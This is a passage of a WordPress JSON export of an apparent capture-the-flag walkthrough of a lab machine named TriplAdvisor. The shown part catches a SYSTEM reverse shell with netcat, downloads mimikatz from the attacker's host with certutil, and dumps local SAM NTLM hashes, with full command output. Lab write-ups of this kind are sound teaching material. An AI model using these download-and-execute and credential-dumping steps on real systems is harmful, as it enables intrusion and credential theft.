class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TriplAdvisor]\n\u2514\u2500$ rlwrap nc -lnvp 2345\nlistening on [any] 2345 ...\nwhoami\nconnect to [192.168.10.101] from (UNKNOWN) [192.168.10.103] 49636\nMicrosoft Windows [Version 6.1.7600]\nCopyright (c) 2009 Microsoft Corporation.  
All rights reserved.\n\nC:\\Windows\\system32&gt;whoami\nnt authority\\system\n\nC:\\Windows\\system32&gt;cd c:\\Users\\websvc\\Desktop\ncd c:\\Users\\websvc\\Desktop\n\nc:\\Users\\websvc\\Desktop&gt;certutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/mimikatz.exe\ncertutil.exe -urlcache -split -f http:\/\/192.168.10.101:8888\/mimikatz.exe\n****  Online  ****\n  000000  ...\n  131308\nCertUtil: -URLCache command completed successfully.\n\nc:\\Users\\websvc\\Desktop&gt;mimikatz.exe privilege::debug token::elevate lsadump::sam exit\nmimikatz.exe privilege::debug token::elevate lsadump::sam exit\n\n  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36\n .## ^ ##.  &quot;A La Vie, A L&#039;Amour&quot; - (oe.eo)\n ## \/ \\ ##  \/*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ \/ ##       &gt; http:\/\/blog.gentilkiwi.com\/mimikatz\n &#039;## v ##&#039;       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  &#039;#####&#039;        &gt; http:\/\/pingcastle.com \/ http:\/\/mysmartlogon.com   ***\/\n\nmimikatz(commandline) # privilege::debug\nPrivilege &#039;20&#039; OK\n\nmimikatz(commandline) # token::elevate\nToken Id  : 0\nUser name : \nSID name  : NT AUTHORITY\\SYSTEM\n\n236     {0;000003e7} 0 D 7912           NT AUTHORITY\\SYSTEM     S-1-5-18        (04g,30p)       Primary\n -&gt; Impersonated !\n * Process Token : {0;000003e7} 0 D 655950      NT AUTHORITY\\SYSTEM     S-1-5-18        (23g,27p)       Primary\n * Thread Token  : {0;000003e7} 0 D 663742      NT AUTHORITY\\SYSTEM     S-1-5-18        (04g,30p)       Impersonation (Delegation)\n\nmimikatz(commandline) # lsadump::sam\nDomain : TRIPLADVISOR\nSysKey : 129514b2fa60646a00037e4df6fc3d3f\nLocal SID : S-1-5-21-2621822639-2474692399-1676906194\n\nSAMKey : d8c54e5c64e72b5baade016eaca4eea6\n\nRID  : 000001f4 (500)\nUser : Administrator\n  Hash NTLM: 2176416a80e4f62804f101d3a55d6c93\n\nRID  : 000001f5 (501)\nUser : Guest\n\nRID  : 000003eb (1003)\nUser : websvc\n  Hash 
NTLM: b0a913673f4f8d5debc49f8fcbbdbb68\n\nmimikatz(commandline) # exit\nBye!<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506041737272.png\" alt=\"image-20250604173636415\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>TriplAdvisor The target machine here is host-only; adjust it to your own setup: Information gathering Port scan \u250c\u2500\u2500(kali\ud83d\udc80k 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-830","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/830","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=830"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/830\/revisions"}],"predecessor-version":[{"id":831,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/830\/revisions\/831"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=830"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=830"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=830"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
